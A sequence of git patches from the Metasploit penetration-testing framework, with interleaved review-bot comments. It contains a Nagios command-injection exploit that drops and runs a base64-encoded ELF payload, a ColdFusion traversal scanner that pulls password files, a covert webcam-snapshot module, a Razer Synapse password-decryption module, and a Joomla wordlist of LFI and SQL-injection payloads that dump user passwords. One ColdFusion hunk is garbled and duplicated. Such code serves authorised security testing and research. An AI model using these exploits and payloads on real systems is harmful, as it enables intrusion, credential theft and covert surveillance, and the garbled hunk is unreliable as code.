@@ -111,17 +115,13 @@ def detect_version(uri) print_error("Please specify the correct path to history.cgi in the URI parameter") return nil, nil end - if res.nil? - print_error("Unable to get a response from the server") - return nil, nil - end # Extract banner from response banner = res.headers['Server'] # Extract version from body version = nil - version_line = res.body.match(/Nagios® Core™ [0-9.]+ -/) + version_line = res.body.match(/Nagios® (Core™ )?[0-9.]+ -/) if not version_line.nil? version = version_line[0].match(/[0-9.]+/)[0] end @@ -133,19 +133,16 @@ def detect_version(uri) end def select_target(version, banner) - # Get version information - if not banner.nil? - print_status("Web Server banner: #{banner}") - end - if not version.nil? - print_status("Nagios version detected: #{version}") - end # No banner and version, no target if banner.nil? or version.nil? return nil end + # Get version information + print_status("Web Server banner: #{banner}") + print_status("Nagios version detected: #{version}") + # Try regex for each target self.targets.each do |t| if t['BannerRE'].nil? or t['VersionRE'].nil? # It doesn't exist in Auto Target @@ -172,9 +169,10 @@ def check print_error("No matching target") return CheckCode::Unknown end + if alert.nil? print_error("At least one ALERT is needed in order to exploit") - return CheckCode::Safe + return CheckCode::Detected end return CheckCode::Vulnerable @@ -183,9 +181,9 @@ def check def exploit # Automatic Targeting mytarget = nil + banner, version, alert = detect_version(target_uri.path) if (target['auto']) print_status("Automatically detecting the target...") - banner, version, alert = detect_version(target_uri.path) mytarget = select_target(banner, version) if mytarget.nil? fail_with(Exploit::Failure::NoTarget, "No matching target") 
@@ -195,8 +193,8 @@ def exploit end print_status("Selected Target: #{mytarget.name}") - if alert and alert.nil? - fail_with(Exploit::Failure::NoTarget, "At least one ALERT is needed in order to exploit") + if alert.nil? + print_error("At least one ALERT is needed in order to exploit, none found in the first page, trying anyway...") end print_status("Sending request to http://#{rhost}:#{rport}#{target_uri.path}") @@ -208,7 +206,11 @@ def exploit tempfile = '/tmp/' + rand_text_alphanumeric(10) # Generate command-line execution - cmd = 'echo ' + elfb64 + '|base64 -d|tee ' + tempfile + ';chmod 700 ' + tempfile + ';rm -rf ' + tempfile + '|' + tempfile + ';' + if mytarget.name =~ /CentOS/ + cmd = "echo #{elfb64}|base64 -d|tee #{tempfile};chmod 700 #{tempfile};rm -rf #{tempfile}|#{tempfile};" + else + cmd = "echo #{elfb64}|base64 -d|tee #{tempfile} |chmod +x #{tempfile};#{tempfile};rm -f #{tempfile}" + end host_value = cmd.gsub!(' ', '${IFS}') # Generate 'host' parameter value @@ -227,9 +229,9 @@ def exploit { 'host' => host_value } - }, 10) + }) - if(not res) + if not res if session_created? print_status("Session created, enjoy!") else @@ -238,17 +240,15 @@ def exploit return end - if(res.code == 401) - print_error("Please specify correct values for USER and PASS") - return + if res.code == 401 + fail_with(Exploit::Failure::NoAccess, "Please specify correct values for USER and PASS") end - if(res.code == 404) - print_error("Please specify the correct path to history.cgi in the URI parameter") - return + if res.code == 404 + fail_with(Exploit::Failure::NotFound, "Please specify the correct path to history.cgi in the TARGETURI parameter") end - print_status("Unknown response") + print_status("Unknown response #{res.code}") end end From 51ba500b9f7cddb9c633b1820ed91566c829119e Mon Sep 17 00:00:00 2001 
From: jvazquez-r7 Date: Wed, 16 Jan 2013 12:28:09 +0100 Subject: [PATCH 041/421] msftidy compliant --- modules/exploits/windows/ssh/freesshd_authbypass.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index 4e667138fe53..8d057a4a7f5c 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -99,7 +99,6 @@ def upload_payload(connection) end cmds.each { |cmd| connection.exec!("cmd.exe /c "+cmd) - } end From 481f2eb791365eefe3d65334b7e44740dde4e61d Mon Sep 17 00:00:00 2001 From: lmercer Date: Wed, 16 Jan 2013 17:23:35 -0500 Subject: [PATCH 042/421] updated cold_fusion_version from Redmine Feature #6822 --- modules/auxiliary/scanner/http/cold_fusion_version.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/cold_fusion_version.rb b/modules/auxiliary/scanner/http/cold_fusion_version.rb index 92aaba751ef8..1f7169e41587 100644 --- a/modules/auxiliary/scanner/http/cold_fusion_version.rb +++ b/modules/auxiliary/scanner/http/cold_fusion_version.rb @@ -36,10 +36,10 @@ def fingerprint(response) end end - len = (response.body.length > 2500) ? 2500 : response.body.length return nil if response.body.length < 100 title = "Not Found" + response.body.gsub!(/[\r\n]/, '') if(response.body =~ /(.+)<\/title\/?>/i) title = $1 title.gsub!(/\s/, '') @@ -51,6 +51,8 @@ def fingerprint(response) if(response.body =~ />\s*Version:\s*(.*)<\/strong\> url, 'method' => 'GET', - }, 5) + }, 10) return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') From 4fd4af1f43cc7bed1261a23bff5fef377767cb7f Mon Sep 17 00:00:00 2001 
From: James Lee Date: Wed, 16 Jan 2013 16:30:38 -0600 Subject: [PATCH 043/421] Fix typo that breaks record_mic command --- .../meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb index e2d05bfa2a0d..a550f9b529b6 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb @@ -29,7 +29,7 @@ def commands reqs = { "webcam_list" => [ "webcam_list" ], "webcam_snap" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ], - "record_mic" => [ "webcam_record_audio" ], + "record_mic" => [ "webcam_audio_record" ], } all.delete_if do |cmd, desc| From ddd2dbc17bb69744409194724951c1a2a03c2167 Mon Sep 17 00:00:00 2001 From: lmercer Date: Wed, 16 Jan 2013 17:54:15 -0500 Subject: [PATCH 044/421] Updated coldfusion_local_traversal as described in Redmine Feature #6822 --- .../http/coldfusion_locale_traversal.rb | 213 ++++++++++++++++-- 1 file changed, 189 insertions(+), 24 deletions(-) diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index f02623f760d1..3a360e80e193 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb 
@@ -29,8 +29,12 @@ def initialize to have directory traversal protections in place, subsequently this module does NOT work against ColdFusion 9. Adobe did not release patches for ColdFusion 6.1 or ColdFusion 7. + + It is not recommended to set FILE when doing scans across a group of servers where the OS + may vary; otherwise, the file requested may not make sense for the OS + }, - 'Author' => [ 'CG' ], + 'Author' => [ 'CG', 'nebulus' ], 'License' => MSF_LICENSE, 'References' => [ 
@@ -45,40 +49,201 @@ def initialize register_options( [ - OptString.new('URL', [ true, "URI Path", '/CFIDE/administrator/enter.cfm']), - OptString.new('PATH', [ true, "traversal and file", '../../../../../../../../../../ColdFusion8/lib/password.properties%00en']), + OptString.new('FILE', [ false, 'File to retrieve (make sure path/file match OS (ie, /etc/passwd on Windows == dumb))', '']), + OptBool.new('FINGERPRINT', [true, 'Only fingerprint endpoints', false]), ], self.class) end + def fingerprint(response) + + if(response.headers.has_key?('Server') ) + if(response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/) + os = "Windows (#{response.headers['Server']})" + elsif(response.headers['Server'] =~ /Apache\//) + os = "Unix (#{response.headers['Server']})" + else + os = response.headers['Server'] + end + end + + return nil if response.body.length < 100 + + title = "Not Found" + response.body.gsub!(/[\r\n]/, '') + if(response.body =~ /(.+)<\/title\/?>/i) + title = $1 + title.gsub!(/\s/, '') + end + return nil if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/) + + out = nil + + if(response.body =~ />\s*Version:\s*(.*)<\/strong\>\s+(.+)<\/title\/?>/i) + title = $1 + title.gsub!(/\s/, '') + end + return nil if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/) + + out = nil - res = send_request_raw({ - 'uri' => url+locale+trav, - 'method' => 'GET', - 'headers' => - { + if(response.body =~ />\s*Version:\s*(.*)<\/strong\>\s+ url, + 'method' => 'GET', 'Connection' => "keep-alive", 'Accept-Encoding' => "zip,deflate", - }, - }, -1) - - if (res.nil?) 
- print_error("no response for #{ip}:#{rport} #{url}") - elsif (res.code == 200) - #print_error("#{res.body}")#debug - print_status("URL: #{ip}#{url}") - if match = res.body.match(/\(.*)\<\/title\>/im); - fileout = $1 - print_status("FILE OUTPUT:\n" + fileout + "\r\n") + }, 10) + return if not res or not res.body or not res.code + + if (res.code.to_i == 200) + out = fingerprint(res) + print_status("#{ip} #{out}") if out + return if (datastore['FINGERPRINT']) + + if(out =~ /Windows/ and out =~ /MX6/) + trav = '..\..\..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en' + elsif(out =~ /Windows/ and out =~ /MX7/) + trav = '..\..\..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en' + elsif(out =~ /Windows/ and out =~ /ColdFusion 8/) + trav = '..\..\..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en' + elsif(out =~ /ColdFusion 9/) + print_status("#{ip} ColdFusion 9 is not vulnerable, skipping") + return + elsif(out =~ /Unix/ and out =~ /MX6/) + trav = '../../../../../../../../../../opt/coldfusionmx/lib/password.properties%00en' + elsif(out =~ /Unix/ and out =~ /MX7/) + trav = '../../../../../../../../../../opt/coldfusionmx7/lib/password.properties%00en' + elsif(out =~ /Unix/ and out =~ /ColdFusion 8/) + trav = '../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en' + else + if(res.body =~ /Adobe/ and res.body =~ /ColdFusion/) + print_error("#{ip} Fingerprint failed, FILE not set...aborting") + else + return # probably just a web server + end + end else - '' + return # silent fail as it doesnt necessarily at this point have to be a CF server end + end + + # file specified or obtained via fingerprint + if(trav !~ /\.\.\/\.\.\// and trav !~ /\.\.\\\.\.\\/) + # file probably specified by user, make sure to add in actual traversal + trav = '../../../../../../../../../../' << trav << '%00en' + end + + locale = "?locale=" + + urls = ["/CFIDE/administrator/enter.cfm", "/CFIDE/wizards/common/_logintowizard.cfm", 
"/CFIDE/administrator/archives/index.cfm", + "/CFIDE/administrator/entman/index.cfm", "/CFIDE/administrator/logging/settings.cfm"] + # "/CFIDE/install.cfm", haven't seen where this one works + + out = '' # to keep output in synch with threads + urls.each do |url| + res = send_request_raw({ + 'uri' => url+locale+trav, + 'method' => 'GET', + 'headers' => + { + 'Connection' => "keep-alive", + 'Accept-Encoding' => "zip,deflate", + }, + }, -1) + + + if (res.nil?) + print_error("no response for #{ip}:#{rport} #{url}") + elsif (res.code == 200) + #print_error("#{res.body}")#debug + out << "URL: #{ip}#{url}#{locale}#{trav}\n" + if match = res.body.match(/\(.*)\<\/title\>/im) + fileout = $1 + if(fileout !~ /Login$/ and fileout !~ /^Welcome to ColdFusion/ and fileout !~ /^Archives and Deployment/) + out << "#{ip} FILE:\n#{fileout}\r\n" + break + end + end + else + next if (res.code == 500 or res.code == 404 or res.code == 302) + print_error("#{ip} #{res.inspect}") + end + end + if(out =~ /FILE/) + print_good(out) else - '' + print_status(out) end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError From a701b5eb79bb4ec0808a047e16946c38734e9928 Mon Sep 17 00:00:00 2001 From: lmercer Date: Wed, 16 Jan 2013 18:21:19 -0500 Subject: [PATCH 045/421] fixed an error that occurred when patching. --- .../http/coldfusion_locale_traversal.rb | 50 +------------------ 1 file changed, 1 insertion(+), 49 deletions(-) diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index 3a360e80e193..06874e30c7ee 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb 
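Review bot: In the new `run_host`, the fingerprint-failure branch prints `Fingerprint failed, FILE not set...aborting` but has no `return`, unlike the sibling branch `return # probably just a web server`. Control therefore falls through to the code that builds `trav` and into the request loop, even though the message says the host was abandoned. Add `return` directly after that `print_error`. The `rescue` list at the end of the hunk names only the Rex connection errors and `::ArgumentError`, so an unexpected `trav` value reaching `'../…' << trav` would presumably surface as an unhandled error rather than a clean skip. The opening of `run_host` is garbled in this copy of the hunk, so the initial value of `trav` cannot be confirmed from here.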
@@ -103,55 +103,7 @@ def fingerprint(response) end def run_host(ip) - trav = datas+ def fingerprint(response) - - if(response.headers.has_key?('Server') ) - if(response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/) - os = "Windows (#{response.headers['Server']})" - elsif(response.headers['Server'] =~ /Apache\//) - os = "Unix (#{response.headers['Server']})" - else - os = response.headers['Server'] - end - end - - return nil if response.body.length < 100 - - title = "Not Found" - response.body.gsub!(/[\r\n]/, '') - if(response.body =~ /(.+)<\/title\/?>/i) - title = $1 - title.gsub!(/\s/, '') - end - return nil if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/) - - out = nil - - if(response.body =~ />\s*Version:\s*(.*)<\/strong\>\s+ Date: Thu, 17 Jan 2013 00:18:13 -0600 Subject: [PATCH 046/421] adds check for empty data b4 sending to parser [RM7269] [fixes RM7269] we discussed the solution to this bug a lot on IRC and in the ticket itself, the consensus was to fix it as far upstream as possible before sending to the parsers so as to avoid any future bugs of the same nature, so this commit adds a check to import_nmap_xml to see if the data is empty before passing it on to the parser, whether that parser is nokogiri or the legacy parser. db_nmap -h now produces the expected output and db_nmap still works as expected. --- lib/msf/core/db.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index 95abe10e2a12..926627ef4fe3 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -4869,6 +4869,7 @@ def import_nmap_noko_stream(args, &block) # If you have Nokogiri installed, you'll be shunted over to # that. Otherwise, you'll hit the old NmapXMLStreamParser. def import_nmap_xml(args={}, &block) + return nil if args[:data].empty? wspace = args[:wspace] || workspace bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : [] 
From 6e8e7a407d34ad7b2b19e26b0f7296e9232a207c Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Thu, 17 Jan 2013 00:30:58 -0600 Subject: [PATCH 047/421] adds a .nil? check as well --- lib/msf/core/db.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index 926627ef4fe3..a8cfe5543112 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -4869,7 +4869,7 @@ def import_nmap_noko_stream(args, &block) # If you have Nokogiri installed, you'll be shunted over to # that. Otherwise, you'll hit the old NmapXMLStreamParser. def import_nmap_xml(args={}, &block) - return nil if args[:data].empty? + return nil if args[:data].nil? or args[:data].empty? wspace = args[:wspace] || workspace bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : [] From 40ba0756557f8ae96416c0f498d8a11252f452f0 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 17 Jan 2013 02:41:16 -0600 Subject: [PATCH 048/421] Implements the webcam feature as a post mod As a post mod, we can deploy the webcam feature more easily against multiple sessions in the web gui. --- modules/post/windows/manage/webcam.rb | 135 ++++++++++++++++++++++++++ 1 file changed, 135 insertions(+) create mode 100644 modules/post/windows/manage/webcam.rb diff --git a/modules/post/windows/manage/webcam.rb b/modules/post/windows/manage/webcam.rb new file mode 100644 index 000000000000..6b838d04aacd --- /dev/null +++ b/modules/post/windows/manage/webcam.rb 
@@ -0,0 +1,135 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Windows Manage Webcam',
+ 'Description' => %q{
+ This module will allow you to these things with your target's webcam: detect,
+ take a snapshot.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'sinn3r'],
+ 'Platform' => [ 'win'],
+ 'SessionTypes' => [ "meterpreter" ],
+ 'Actions' =>
+ [
+ [ 'LIST', { 'Description' => 'Show a list of webcams' } ],
+ [ 'SNAPSHOT', { 'Description' => 'Take a snapshot with the webcam' } ]
+ ],
+ 'DefaultAction' => 'LIST'
+ ))
+
+ register_options(
+ [
+ OptInt.new('INDEX', [false, 'The index of the webcam to use', 1]),
+ OptInt.new('QUALITY', [false, 'The JPEG image quality', 50])
+ ], self.class)
+ end
+
+
+ def run
+ if client.nil?
+ print_error("Invalid session ID selected. Make sure the host isn't dead.")
+ return
+ end
+
+ if not action
+ print_error("Invalid action")
+ return
+ end
+
+ case action.name
+ when /^list$/i
+ list_webcams(true)
+ when /^snapshot$/i
+ snapshot
+ end
+ end
+
+
+ def rhost
+ client.sock.peerhost
+ end
+
+
+ def snapshot
+ webcams = list_webcams
+
+ if webcams.empty?
+ print_error("#{rhost} - No webcams found")
+ return
+ end
+
+ if not webcams[datastore['INDEX']-1]
+ print_error("#{rhost} - No such index: #{datastore['INDEX'].to_s}")
+ return
+ end
+
+ buf = nil
+
+ begin
+ print_status("#{rhost} - Starting...")
+ client.webcam.webcam_start(datastore['INDEX'])
+
+ buf = client.webcam.webcam_get_frame(datastore['QUALITY'])
+ if buf
+ print_status("#{rhost} - Got frame")
+
+ p = store_loot(
+ "#{rhost}.webcam.snapshot",
+ 'application/octet-stream',
+ rhost,
+ buf,
+ "#{rhost}_snapshot.jpg",
+ "#{rhost} Webcam Snapshot"
+ )
+
+ print_good("#{rhost} - Snapshot saved: #{p}")
+ end
+
+ client.webcam.webcam_stop
+ print_status("#{rhost} - Stopped")
+ rescue Rex::Post::Meterpreter::RequestError => e
+ print_error(e.message)
+ return
+ end
+ end
+
+
+ def list_webcams(show=false)
+ begin
+ webcams = client.webcam.webcam_list
+ rescue Rex::Post::Meterpreter::RequestError
+ webcams = []
+ end
+
+ if show
+ tbl = Rex::Ui::Text::Table.new(
+ 'Header' => 'Webcam List',
+ 'Indent' => 1,
+ 'Columns' => ['Index', 'Name']
+ )
+
+ webcams.each_with_index do |name, indx|
+ tbl << [(indx+1).to_s, name]
+ end
+
+ print_line(tbl.to_s)
+ end
+
+ return webcams
+ end
+
+end
\ No newline at end of file
From 09b4a09ce1dfc7a0e63d72d338835d41c21fe95f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 17 Jan 2013 16:53:00 +0100 Subject: [PATCH 049/421] module razer_synapse cleanup
---
.../gather/credentials/razer_synapse.rb | 20 ++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-)
diff --git a/modules/post/windows/gather/credentials/razer_synapse.rb b/modules/post/windows/gather/credentials/razer_synapse.rb
index 96f94572968e..b0b569ade040 100644
--- a/modules/post/windows/gather/credentials/razer_synapse.rb
+++ b/modules/post/windows/gather/credentials/razer_synapse.rb
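Review bot: In `snapshot`, `client.webcam.webcam_stop` runs only on the success path, so a `RequestError` from `webcam_get_frame`, or any error raised by `store_loot`, leaves the device started on the host under test. Moving the stop into an `ensure` clause of the same `begin` block, guarded by a flag set once `webcam_start` has returned, restores the device state on every path. The index guard also accepts `INDEX` 0: `webcams[datastore['INDEX']-1]` then reads `webcams[-1]`, the last entry, so the check passes. `if datastore['INDEX'] < 1 or not webcams[datastore['INDEX']-1]` rejects it.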
@@ -15,6 +15,7 @@ class Metasploit3 < Msf::Post include Msf::Post::Common include Msf::Post::Windows::UserProfiles + include Msf::Post::File def initialize(info={}) super(update_info(info, @@ -23,7 +24,7 @@ def initialize(info={}) This module will enumerate passwords stored by the Razer Synapse client. The encryption key and iv is publicly known. This module will not only extract encrypted password but will also decrypt - password using public key. Affects version 1.7.15 and earlier. + password using public key. Affects versions earlier than 1.7.15. }, 'License' => MSF_LICENSE, 'Author' => @@ -32,9 +33,13 @@ def initialize(info={}) 'Matt Howard "pasv" ', #PoC 'Brandon McCann "zeknox" ' ], + 'References' => + [ + [ 'URL', 'http://www.pentestgeek.com/2013/01/16/hard-coded-encryption-keys-and-more-wordpress-fun/' ], + [ 'URL', 'https://github.com/pasv/Testing/blob/master/Razer_decode.py' ] + ], 'SessionTypes' => [ 'meterpreter' ], - 'Platform' => [ 'win' ], - + 'Platform' => [ 'win' ] )) end @@ -61,7 +66,7 @@ def decrypt(hash) def store_creds(user, pass) if db report_auth_info( - :host => client.sock.peerhost, + :host => Rex::Socket.resolv_to_dotted("www.razerzone.com"), :port => 443, :ptype => 'password', :sname => 'razer_synapse', @@ -98,13 +103,10 @@ def run grab_user_profiles().each do |user| if user['LocalAppData'] accounts = user['LocalAppData'] + "\\Razer\\Synapse\\Accounts\\RazerLoginData.xml" - # open the file for reading - config = client.fs.file.new(accounts, 'r') rescue nil - next if config.nil? + next if not file?(accounts) print_status("Config found for user #{user['UserName']}") - contents = config.read - config.close + contents = read_file(accounts) # read the contents of file creds = parse_config(contents) From 0b61d28e0ee433e9a9daf9f411b61993e30c5baa Mon Sep 17 00:00:00 2001 
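Review bot: In the `store_creds` hunk, `:host => Rex::Socket.resolv_to_dotted("www.razerzone.com")` makes every stored credential depend on a live DNS lookup at report time. If the name does not resolve, the call presumably raises and the recovered account is never recorded, and the stored address can differ from run to run. Resolving once before the `report_auth_info` call, with a handled failure path, would keep the report step from being lost. A comment such as `# credential belongs to the Razer cloud service, not the session host` would also explain why `client.sock.peerhost` was dropped. In the last hunk, the result of `read_file(accounts)` goes straight to `parse_config`; an empty result should be skipped with `next if contents.nil? or contents.empty?`. `store_creds` and `run` both continue outside their hunks.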
From: f8lerror Date: Thu, 17 Jan 2013 11:36:59 -0500 Subject: [PATCH 050/421] added Joomla scanner and url wordlist --- data/wordlists/pcheck.txt | 627 ++++++++++++++++++ .../auxiliary/scanner/http/joomla_vulnscan.rb | 270 ++++++++ 2 files changed, 897 insertions(+) create mode 100755 data/wordlists/pcheck.txt create mode 100755 modules/auxiliary/scanner/http/joomla_vulnscan.rb diff --git a/data/wordlists/pcheck.txt b/data/wordlists/pcheck.txt new file mode 100755 index 000000000000..b65dd2a422e2 --- /dev/null +++ b/data/wordlists/pcheck.txt 
@@ -0,0 +1,627 @@ +&controller=../../../../../../../../../../../../[LFI]%00 +?1.5.10-x +?1.5.11-x-http_ref +?1.5.11-x-php-s3lf +?1.5.3-path-disclose +?1.5.3-spam +?1.5.8-x +?1.5.9-x +?j1012-fixate-session +?option=com_mysms&Itemid=0&task=phonebook +Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png +admin/ +administrator/ +administrator/components/ +administrator/components/com_a6mambocredits/ +administrator/components/com_a6mambohelpdesk/ +administrator/components/com_admin/admin.admin.html.php +administrator/components/com_astatspro/refer.php +administrator/components/com_bayesiannaivefilter/ +administrator/components/com_chronocontact/excelwriter/PPS/File.php +administrator/components/com_colophon/ +administrator/components/com_colorlab/ +administrator/components/com_comprofiler/ +administrator/components/com_comprofiler/plugin.class.php +administrator/components/com_cropimage/admin.cropcanvas.php +administrator/components/com_extplorer/ +administrator/components/com_feederator/includes/tmsp/add_tmsp.php +administrator/components/com_googlebase/ +administrator/components/com_installer +administrator/components/com_jcs/ +administrator/components/com_jim/ +administrator/components/com_jjgallery/ +administrator/components/com_joom12pic/ +administrator/components/com_joomla-visites/ +administrator/components/com_joomla_flash_uploader/ +administrator/components/com_joomlaflashfun/ +administrator/components/com_joomlaradiov5/ +administrator/components/com_jpack/ +administrator/components/com_jreactions/ +administrator/components/com_juser/ +administrator/components/com_admin/ +administrator/components/com_kochsuite / +administrator/components/com_linkdirectory/ +administrator/components/com_livechat/getSavedChatRooms.php +administrator/components/com_livechat/xmlhttp.php +administrator/components/com_lurm_constructor/admin.lurm_constructor.php 
+administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php"); +administrator/components/com_mambelfish/ +administrator/components/com_mgm/ +administrator/components/com_mmp/help.mmp.php +administrator/components/com_mosmedia/ +administrator/components/com_multibanners/extadminmenus.class.php +administrator/components/com_panoramic/ +administrator/components/com_peoplebook/param.peoplebook.php +administrator/components/com_phpshop/toolbar.phpshop.html.php +administrator/components/com_remository/admin.remository.php +administrator/components/com_serverstat/install.serverstat.php +administrator/components/com_simpleswfupload/uploadhandler.php"); +administrator/components/com_swmenupro/ +administrator/components/com_treeg/ +administrator/components/com_uhp/ +administrator/components/com_uhp2/ +administrator/components/com_webring/ +administrator/components/com_wmtgallery/ +administrator/components/com_wmtportfolio/ +administrator/components/com_x-shop/ +administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ +administrator/index.php?option=com_searchlog&act=log +ajaxim/ +akocomments.php +cart?Itemid=[SQLi] +component/com__brightweblinks/ +component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 +component/osproperty/?task=agent_register +component/quran/index.php?option=com_quran&action=viewayat&surano= +components/com_ clickheat/ +components/com_5starhotels/ +components/com_Jambook/jambook.php +components/com_a6mambocredits/ +components/com_a6mambohelpdesk/ +components/com_ab_gallery/ +components/com_acajoom/ +components/com_acctexp/ +components/com_aclassf/ +components/com_activities/ +components/com_actualite/ +components/com_admin/admin.admin.html.php +components/com_advancedpoll/ +components/com_agora/ +components/com_agoragroup/ +components/com_ajaxchat/ +components/com_akobook/ +components/com_akocomment/ +components/com_akogallery 
+components/com_alberghi/ +components/com_allhotels/ +components/com_alphacontent/ +components/com_altas/ +components/com_amocourse/ +components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php +components/com_articles/ +components/com_artist/ +components/com_artlinks/ +components/com_asortyment/ +components/com_astatspro/ +components/com_awesom/ +components/com_babackup/ +components/com_banners/ +components/com_bayesiannaivefilter/ +components/com_be_it_easypartner/ +components/com_beamospetition/ +components/com_biblestudy/ +components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_blog/ +components/com_bookflip/ +components/com_bookjoomlas/ +components/com_booklibrary/ +components/com_books/ +components/com_bsadv/ +components/com_bsq_sitestats/ +components/com_bsq_sitestats/external/rssfeed.php +components/com_bsqsitestats/ +components/com_calendar/ +components/com_camelcitydb2/ +components/com_candle/ +components/com_casino_blackjack/ +components/com_casino_videopoker/ +components/com_casinobase/ +components/com_catalogproduction/ +components/com_catalogshop/ +components/com_category/ +components/com_cgtestimonial/video.php?url="> +components/com_chronocontact/excelwriter/PPS/File.php +components/com_cinema/ +components/com_clasifier/ +components/com_classifieds/ +components/com_clickheat/ +components/com_cloner/ +components/com_cmimarketplace/ +components/com_cms/ +components/com_colophon/ +components/com_colorlab/ +components/com_competitions/ +components/com_comprofiler/ +components/com_comprofiler/plugin.class.php +components/com_contactinfo/ +components/com_content/ +components/com_cpg/cpg.php +components/com_cropimage/admin.cropcanvas.php +components/com_custompages/ +components/com_cx/ 
+components/com_d3000/ +components/com_dadamail/ +components/com_dailymessage/ +components/com_datsogallery/ +components/com_dbquery/ +components/com_detail/ +components/com_digistore/ +components/com_directory/ +components/com_djiceshoutbox/ +components/com_doc/ +components/com_downloads/ +components/com_ds-syndicate/ +components/com_dtregister/ +components/com_dv/externals/phpupload/upload.php"); +components/com_easybook/ +components/com_emcomposer/ +components/com_equotes/ +components/com_estateagent/ +components/com_eventing/ +components/com_eventlist/ +components/com_events/ +components/com_ewriting/ +components/com_expose/uploadimg.php +components/com_expshop/ +components/com_extcalendar/ +components/com_extcalendar/cal_popup.php?extmode=view&extid= +components/com_extcalendar/extcalendar.php +components/com_extended_registration/registration_detailed.inc.php +components/com_extplorer/ +components/com_ezine/ +components/com_ezstore/ +components/com_facileforms/ +components/com_fantasytournament/ +components/com_faq/ +components/com_feederator/includes/tmsp/add_tmsp.php +components/com_filebase/ +components/com_filiale/ +components/com_flashfun/ +components/com_flashmagazinedeluxe/ +components/com_flippingbook/ +components/com_flyspray/startdown.php +components/com_fm/fm.install.php +components/com_foevpartners/ +components/com_football/ +components/com_formtool/ +components/com_forum/ +components/com_fq/ +components/com_fundraiser/ +components/com_galeria/ +components/com_galleria/galleria.html.php +components/com_gallery/ +components/com_game/ +components/com_gameq/ +components/com_garyscookbook/ +components/com_genealogy/ +components/com_geoboerse/ +components/com_gigcal/ +components/com_gmaps/ +components/com_googlebase/ +components/com_gsticketsystem/ +components/com_guide/ +components/com_hashcash/server.php +components/com_hbssearch/ +components/com_hello_world/ +components/com_hotproperties/ +components/com_hotproperty/ +components/com_hotspots/ 
